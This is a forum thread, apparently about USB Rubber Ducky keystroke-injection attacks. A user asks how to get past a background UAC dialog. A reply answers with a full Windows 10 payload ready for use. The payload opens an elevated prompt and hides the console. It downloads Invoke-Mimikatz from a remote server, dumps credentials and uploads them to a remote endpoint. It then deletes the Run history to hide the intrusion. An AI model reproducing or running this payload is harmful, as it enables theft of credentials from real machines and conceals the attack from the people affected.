Jump to content

Mr. Robot Attack ALT Y issue


korang
 Share

Recommended Posts

OK so when running the "Mr. Robot" attack on a system (yes I am authorized).  It seems when it does admin command prompt, the Dialog box becomes back grounded, so the ALT y does not hit yes.  Is there any way to may the duck make sure this dialog box is the active window then do the ALT y command?.  I have manually tested ALT y and it does work , I just noticed in my testing that for some reason the dialog box is not active and this cause issues with the script running.

 

Or is there a way to psue the script till I hit yes then use the ducky button to continue running script?

 

Thanks

Link to comment
Share on other sites

  • 3 weeks later...

i had same problem on windows 10 BUT how i did solved it ? i replaced ALT y by

LEFT
ENTER 

so what's LEFT ? it's LEFTARROW on the keyboard so left key make the focus on the YES button!! than hit ENTER ;)

 

here's my payload for windows 10

 

 

REM Title: Invoke mimikatz and send creds to remote server
REM Author: Hak5Darren Props: Mubix, Clymb3r, Gentilkiwi, SamOX
DELAY 1000
REM Open an admin command prompt 
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 2000
LEFT
ENTER
DELAY 2000
REM Obfuscate the command prompt
STRING mode con:cols=18 lines=1
ENTER
STRING color FE
ENTER
DELAY 2000
STRING powershell IEX (New-Object Net.WebClient).DownloadString('http://yourserver/Invoke-Mimikatz.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('http://yourserver/vc/rx.php', $output)
ENTER
REM Clear the Run history and exit
STRING powershell Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
ENTER
STRING exit
ENTER

 

 

Good Luck!!

 

Link to comment
Share on other sites

  • 2 months later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...